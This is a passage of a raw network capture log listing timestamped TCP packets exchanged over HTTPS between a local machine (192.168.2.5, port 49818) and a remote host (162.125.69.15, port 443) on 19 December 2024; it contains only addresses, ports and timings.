                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.116087914 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.116146088 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.116153002 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.116223097 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.116223097 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.130484104 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.130553961 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.130594969 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.130603075 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.130698919 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.266056061 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.266122103 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.266186953 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.266200066 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.266215086 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.266261101 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.273144007 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.273195982 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.273257971 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.273267031 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.273286104 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.273356915 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.279486895 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.279541016 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.279617071 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.279627085 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.279638052 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.279772043 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.286782026 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.286827087 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.286876917 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.286887884 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.286936998 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.286969900 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.294039011 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.294081926 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.294158936 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.294167995 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.294179916 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.294219017 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.301016092 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.301062107 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.301094055 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.301105022 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.301151037 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.301151037 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.308298111 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.308340073 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.308401108 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.308401108 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.308408976 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.308530092 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.322768927 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.322809935 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.322840929 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.322849035 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.322886944 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.322940111 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.323107004 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.458033085 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.458059072 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.458156109 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.458174944 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.458266973 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.465229988 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.465250969 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.465306044 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.465316057 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.465356112 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.465372086 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.472629070 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.472647905 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.472692966 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.472702980 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.472728968 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.472754955 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.479008913 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.479031086 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.479074001 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.479120016 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.479127884 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.479209900 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.486329079 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.486350060 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.486546040 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.486557007 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.488509893 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.493415117 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.493438005 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.493480921 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.493490934 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.493531942 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.493531942 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.500499010 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.500518084 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.500557899 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.500575066 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.500607014 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.500667095 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.514866114 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.514887094 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.514992952 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.515005112 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.515054941 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.650728941 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.650753975 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.650809050 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.650829077 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.650875092 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.650875092 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.657942057 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.657963037 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.658024073 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.658035040 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.658051014 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.658082008 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.664349079 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.664370060 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.664582968 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.664594889 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.664650917 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.671623945 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.671643019 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.671709061 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.671717882 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.671797037 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.671797037 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.678997040 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.679020882 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.679068089 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.679102898 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.679111004 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.679192066 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.685864925 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.685885906 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.685946941 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.685955048 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.686003923 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.686003923 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.693408966 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.693432093 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.693483114 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.693492889 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.693516016 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.693562031 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.707161903 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.707181931 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.707254887 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.707272053 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.707336903 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.707364082 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.708167076 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.842639923 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.842665911 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.842788935 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.842788935 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.842803955 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.844449997 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.849812031 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.849838018 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.849878073 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.849889994 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.849929094 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.849929094 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.856904030 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.856924057 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.857004881 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.857004881 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.857017040 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.857090950 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.863652945 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.863672972 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.863701105 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.863723040 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.863768101 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.863768101 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.870922089 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.870942116 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.870980024 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.870989084 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.871033907 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.871033907 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.877934933 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.877954006 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.878026962 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.878036976 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.878067017 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.878104925 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.885118961 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.885140896 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.885194063 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.885201931 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.885251045 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.885251045 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.899461031 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.899486065 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.899559021 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.899559021 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.899569035 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:41.899708986 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.035563946 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.035594940 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.035700083 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.035700083 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.035718918 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.035891056 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.041971922 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.041994095 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.042146921 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.042146921 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.042157888 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.042306900 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.049386978 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.049412012 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.049478054 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.049493074 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.049860001 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.049860001 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.056572914 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.056595087 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.056651115 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.056668997 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.056699038 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.056715012 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.063937902 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.063958883 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.064013004 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.064021111 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.064097881 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.064097881 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.070766926 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.070789099 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.070871115 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.070871115 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.070880890 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.070970058 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.077243090 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.077264071 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.077316999 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.077325106 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.077368975 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.077384949 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.091705084 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.091727972 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.091773033 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.091789961 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.091850996 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.092077017 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.227475882 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.227507114 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.227664948 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.227664948 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.227683067 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.227875948 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.234575033 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.234596014 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.234680891 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.234690905 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.234764099 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.242007017 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.242027044 CET44349818162.125.69.15192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.242070913 CET49818443192.168.2.5162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:42.242080927 CET44349818162.125.69.15192.168.2.5
